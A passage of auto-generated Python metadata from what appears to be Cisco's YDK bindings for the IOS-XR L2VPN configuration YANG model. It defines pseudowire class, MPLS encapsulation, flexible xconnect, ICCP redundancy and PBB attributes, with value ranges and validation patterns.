'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_ENUM_CLASS, 'MplsSequencingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MplsSequencingEnum',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'sequencing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
False,
[
_MetaInfoClassMember('redundancy-initial-delay', ATTRIBUTE, 'int' , None, None,
[('0', '120')], [],
''' Initial delay before activating the
redundant PW, in seconds
''',
'redundancy_initial_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('redundancy-one-way', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Force one-way PW redundancy behavior in
Redundancy Group
''',
'redundancy_one_way',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-redundancy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
False,
[
_MetaInfoClassMember('fallback-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Fallback disable
''',
'fallback_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-tunnel-number', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Interface Tunnel number for preferred path
''',
'interface_tunnel_number',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'PreferredPathEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PreferredPathEnum',
[], [],
''' Preferred Path Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'preferred-path',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
False,
[
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance-code', REFERENCE_ENUM_CLASS, 'FlowLabelTlvCodeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelTlvCodeEnum',
[], [],
''' Enable Legacy Flow Label TLV code
''',
'flow_label_load_balance_code',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-label-load-balance', REFERENCE_ENUM_CLASS, 'LoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LoadBalanceEnum',
[], [],
''' Enable PW Label based Load Balancing
''',
'pw_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'load-balance-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
False,
[
_MetaInfoClassMember('control-word', REFERENCE_ENUM_CLASS, 'ControlWordEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ControlWordEnum',
[], [],
''' Enable control word
''',
'control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MPLS encapsulation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balance-group', REFERENCE_CLASS, 'LoadBalanceGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
[], [],
''' Load Balancing
''',
'load_balance_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-redundancy', REFERENCE_CLASS, 'MplsRedundancy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
[], [],
''' Redundancy options for MPLS encapsulation
''',
'mpls_redundancy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('preferred-path', REFERENCE_CLASS, 'PreferredPath' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
[], [],
''' Preferred path
''',
'preferred_path',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-switching-tlv', REFERENCE_ENUM_CLASS, 'PwSwitchingPointTlvEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PwSwitchingPointTlvEnum',
[], [],
''' Pseudowire Switching Point Tlv
''',
'pw_switching_tlv',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_CLASS, 'Sequencing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signaling-protocol', REFERENCE_ENUM_CLASS, 'MplsSignalingProtocolEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MplsSignalingProtocolEnum',
[], [],
''' MPLS signaling protocol
''',
'signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Source IP address
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static-tag-rewrite', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Static Tag rewrite
''',
'static_tag_rewrite',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'TransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TransportModeEnum',
[], [],
''' Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vccv-type', REFERENCE_ENUM_CLASS, 'VccvVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'VccvVerificationEnum',
[], [],
''' VCCV verification type
''',
'vccv_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-encapsulation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-disable-delay', REFERENCE_CLASS, 'BackupDisableDelay' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
[], [],
''' Back Up Pseudowire class
''',
'backup_disable_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire class
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tpv3-encapsulation', REFERENCE_CLASS, 'L2Tpv3Encapsulation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
[], [],
''' L2TPv3 encapsulation
''',
'l2tpv3_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-withdraw', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable backup MAC withdraw
''',
'mac_withdraw',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-encapsulation', REFERENCE_CLASS, 'MplsEncapsulation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
[], [],
''' MPLS encapsulation
''',
'mpls_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-class',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses',
False,
[
_MetaInfoClassMember('pseudowire-class', REFERENCE_LIST, 'PseudowireClass' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass',
[], [],
''' Pseudowire class
''',
'pseudowire_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-classes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
False,
[
_MetaInfoClassMember('vlan-unaware-fxc-attachment-circuit', REFERENCE_LIST, 'VlanUnawareFxcAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
[], [],
''' Attachment circuit interface
''',
'vlan_unaware_fxc_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
False,
[
_MetaInfoClassMember('vlan-unaware-fxc-pseudowire-evpn', REFERENCE_LIST, 'VlanUnawareFxcPseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
[], [],
''' EVPN FXC Service Configuration
''',
'vlan_unaware_fxc_pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 23)], [],
''' Name of the Flexible XConnect Service
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('vlan-unaware-fxc-attachment-circuits', REFERENCE_CLASS, 'VlanUnawareFxcAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
[], [],
''' List of attachment circuits
''',
'vlan_unaware_fxc_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vlan-unaware-fxc-pseudowire-evpns', REFERENCE_CLASS, 'VlanUnawareFxcPseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
[], [],
''' List of EVPN Services
''',
'vlan_unaware_fxc_pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-flexible-xconnect-service',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
False,
[
_MetaInfoClassMember('vlan-unaware-flexible-xconnect-service', REFERENCE_LIST, 'VlanUnawareFlexibleXconnectService' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
[], [],
''' Flexible XConnect Service
''',
'vlan_unaware_flexible_xconnect_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-flexible-xconnect-services',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable',
False,
[
_MetaInfoClassMember('vlan-unaware-flexible-xconnect-services', REFERENCE_CLASS, 'VlanUnawareFlexibleXconnectServices' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
[], [],
''' List of Vlan-Unaware Flexible XConnect
Services
''',
'vlan_unaware_flexible_xconnect_services',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flexible-xconnect-service-table',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface name
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mac-flush-tcn', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable STP-TCN MAC flushing
''',
'mac_flush_tcn',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('primary-vlan-range', ATTRIBUTE, 'str' , None, None,
[], [],
''' Primary VLAN range, in the form of 1-3,5
,8-11
''',
'primary_vlan_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('recovery-delay', ATTRIBUTE, 'int' , None, None,
[('30', '3600')], [],
''' Failure clear recovery delay
''',
'recovery_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('secondary-vlan-range', ATTRIBUTE, 'str' , None, None,
[], [],
''' Secondary VLAN range, in the form of 1-3,5
,8-11
''',
'secondary_vlan_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
False,
[
_MetaInfoClassMember('iccp-interface', REFERENCE_LIST, 'IccpInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
[], [],
''' Interface name
''',
'iccp_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
False,
[
_MetaInfoClassMember('group-id', ATTRIBUTE, 'int' , None, None,
[('-2147483648', '2147483647')], [],
''' Group ID
''',
'group_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('iccp-interfaces', REFERENCE_CLASS, 'IccpInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
[], [],
''' List of interfaces
''',
'iccp_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('multi-homing-node-id', ATTRIBUTE, 'int' , None, None,
[('0', '254')], [],
''' ICCP-based service multi-homing node ID
''',
'multi_homing_node_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-redundancy-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups',
False,
[
_MetaInfoClassMember('iccp-redundancy-group', REFERENCE_LIST, 'IccpRedundancyGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
[], [],
''' ICCP Redundancy group
''',
'iccp_redundancy_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-redundancy-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable redundancy groups
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('iccp-redundancy-groups', REFERENCE_CLASS, 'IccpRedundancyGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups',
[], [],
''' List of Inter-Chassis Communication Protocol
redundancy groups
''',
'iccp_redundancy_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'redundancy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database',
False,
[
_MetaInfoClassMember('bridge-domain-groups', REFERENCE_CLASS, 'BridgeDomainGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups',
[], [],
''' List of bridge groups
''',
'bridge_domain_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flexible-xconnect-service-table', REFERENCE_CLASS, 'FlexibleXconnectServiceTable' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable',
[], [],
''' List of Flexible XConnect Services
''',
'flexible_xconnect_service_table',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('g8032-rings', REFERENCE_CLASS, 'G8032Rings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings',
[], [],
''' List of G8032 Ring
''',
'g8032_rings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-classes', REFERENCE_CLASS, 'PseudowireClasses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses',
[], [],
''' List of pseudowire classes
''',
'pseudowire_classes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('redundancy', REFERENCE_CLASS, 'Redundancy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy',
[], [],
''' Redundancy groups
''',
'redundancy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('xconnect-groups', REFERENCE_CLASS, 'XconnectGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups',
[], [],
''' List of xconnect groups
''',
'xconnect_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'database',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Pbb' : {
'meta_info' : _MetaInfoClass('L2Vpn.Pbb',
False,
[
_MetaInfoClassMember('backbone-source-mac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone Source MAC
''',
'backbone_source_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.AutoDiscovery.BgpSignaling' : {
'meta_info' : _MetaInfoClass('L2Vpn.AutoDiscovery.BgpSignaling',
False,
[
_MetaInfoClassMember('mtu-mismatch-ignore', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ignore MTU mismatch for auto-discovered
pseudowires
''',
'mtu_mismatch_ignore',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
